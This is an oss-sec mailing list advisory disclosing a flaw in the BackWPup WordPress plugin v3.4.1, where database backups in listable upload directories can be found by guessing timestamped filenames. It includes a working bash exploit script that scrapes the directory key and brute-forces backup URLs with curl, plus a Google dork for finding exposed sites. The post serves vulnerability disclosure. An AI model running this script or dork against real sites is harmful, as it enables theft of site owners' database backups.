oss-sec mailing list archives
Vulnerability in Wordpress Plugin backwpup v3.4.1 possible brute forcing of backup file download
From: "Larry W. Cashdollar" <larry0 () me com>
Date: Wed, 27 Sep 2017 12:13:47 -0400
Title: Vulnerability in Wordpress Plugin backwpup v3.4.1 possible brute forcing of backup file download Author: Larry W. Cashdollar, @_larry0 Date: 2017-09-08 CVE-ID:[CVE-2017-2551] Download Site: https://wordpress.org/plugins/backwpup Vendor: Inpsyde Vendor Notified: 2017-09-08, fixed v3.4.2 Vendor Contact: plugins () wordpress org Advisory: http://www.vapidlabs.com/advisory.php?v=201 Description: "The backup plugin BackWPup can be used to save your complete installation including /wp-content/ and push them to an external Backup Service, like Dropbox, S3, FTP and many more." Vulnerability: There is a weakness in the way backwpup creates and stores the backup files it generates. It creates a random string to obscure the location, but it uses that same string to create the storage directory under wp-content/uploads/ which in most installations of WordPress allows file listings. Someone looking to steal a copy of the database could simply list the directories in /uploads to find that random string and then brute force the location of the file as its structure is just a date and time stamp. It would take a Maximum of 86400 tries to guess if a backup is available for that day. Filename format: backwpup_ RANDOMSTRINGBACKUPNUMBER_%Y-%m-%d_%H-%i-%s Default settings are: %d = Two digit day of the month, with leading zeros %m = Day of the month, with leading zeros %Y = Four digit representation for the year %H = Hour in 24-hour format, with leading zeros %i = Two digit representation of the minute %s = Two digit representation of the second https://wordpress.org/plugins/backwpup Exploit Code: • #!/bin/bash • #Exploit for Wordpress Plugin BackWPup v3.4.1 • #Download https://wordpress.org/plugins/backwpup • #CWE-552: Files or Directories Accessible to External Parties • #CVE-ID: CVE-2017-2551 • #Google Dork: inurl:wp-content/uploads/backwpup • • • #Add banner about vulnerability • • KEY=`curl --silent http://$1/wp-content/uploads/|html2text |grep backups | awk -F- '{print $2}'` • • #Add error checking here • echo "[+] Getting Unique Key $KEY" • DIR="backwpup-$KEY-backups" • echo "[+] Checking directory $DIR" • WPATH="$DIR/backwpup_$KEY" • echo "[+] Creating Path: $WPATH" • #use date command here for the default date of current day • MONTH=09 • DAY=07 • YEAR=2017 • Z=0 • • echo "[+] Scanning website for available backups:" • for y in `seq -w 0 23`; do • for x in `seq -w 0 59`; do • Y=`echo "scale=2;($Z/86000)*100"|bc`; • echo -ne "\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b$CWPATH $Y%" • for z in `seq -w 0 59`; do • Z=$(( $Z + 1 )); • CWPATH="http://$1/wp-content/uploads/$WPATH"01"_"$YEAR"-"$MONTH"-"$DAY"_"$y"-"$x"-"$z".zip"; • RESULT=`curl -s --head $CWPATH|grep 200`; • if [ -n "$RESULT" ]; then • echo "" • echo "[+] Location $CWPATH Found"; • echo "[+] Received $RESULT"; • echo "Downloading......"; • # wget $CWPATH • exit; • fi; • done • done • done • echo "Completed." Screen Shots: Notes: Google Dork: inurl:wp-content/uploads/backwpup
Current thread:
- Vulnerability in Wordpress Plugin backwpup v3.4.1 possible brute forcing of backup file download Larry W. Cashdollar (Sep 27)